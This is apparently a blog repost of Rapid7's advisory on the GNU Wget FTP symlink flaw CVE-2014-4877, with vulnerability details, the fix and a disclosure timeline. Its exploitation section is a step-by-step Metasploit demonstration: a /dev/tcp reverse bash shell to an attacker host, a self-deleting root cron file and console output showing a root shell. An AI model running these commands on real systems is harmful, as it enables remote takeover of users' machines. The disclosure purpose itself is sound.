본문 바로가기

Metasploit

GNU Wget FTP Symlink Arbitrary Filesystem Access

728x90

GNU Wget is a command-line utility designed to download files via HTTP, HTTPS, and FTP.  Wget versions prior to 1.16 are vulnerable a symlink attack (CVE-2014-4877) when running in recursive mode with a FTP target. This vulnerability allows an attacker operating a malicious FTP server to create arbitrary files, directories, and symlinks on the user's filesystem. The symlink attack allows file contents to be overwritten, including binary files, and access to the entire filesystem with the permissions of the user running wget. This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys.

Vulnerability

 

The flaw is triggered when wget receives a directory listing that includes a symlink followed by a directory with the same name. The output of the LIST command would look like the following, which is not possible on a real FTP server.

 

lrwxrwxrwx  1 root    root          33 Oct 28  2014 TARGET -> /

drwxrwxr-x  15 root    root        4096 Oct 28  2014 TARGET

 

Wget would first create a local symlink named TARGET that points to the root filesystem. It would then enter the TARGET directory and mirror its contents across the user's filesystem.

 

Remediation

 

Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch. If you use a distribution that does not ship a patched version of wget, you can mitigate the issue by adding the line "retr-symlinks=on" to either /etc/wgetrc or ~/.wgetrc. This issue is only exploitable when running wget with recursive mode against a FTP server URL. Although a HTTP service can redirect wget to a FTP URL, it implicitly disables the recursive option after following this redirect, and is not exploitable in this scenario.

 

 

Exploitation

 

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

 

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

 

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

 

cat>cronshell <<EOD

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell

EOD

 

Now we start up msfconsole and configure a shell listener:

 

msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST 192.168.0.4

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444

 

Finally we switch to the wget module itself:

 

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m ftp://192.168.0.4:21/

[*] Server started.

 

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

 

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> RETR cronshell

[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

 

 

msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...

 

id

uid=0(root) gid=0(root) groups=0(root),1001(rvm)


Disclosure Timeline

The issue was discovered by HD Moore of Rapid7, and was disclosed to both the upstream provider of Wget and CERT/CC as detailed below:

 

DateAction
Thu, Aug 28, 2014Issue discovered by HD Moore and advisory written
Thu, Aug 28, 2014Advisory provided to Giuseppe Scrivano, the maintainer of Wget
Sat, Sep 01, 2014Vendor responded, confirmed issue and patch
Tue, Sep 30, 2014Advisory provided to CERT/CC
Tue, Oct 07, 2014CVE-2014-4877 assigned via CERT/CC
Mon, Oct 27, 2014Redhat bug 1139181 published
Tue, Oct 28, 2014Rapid7 advisory and Metasploit module published as PR 4088
728x90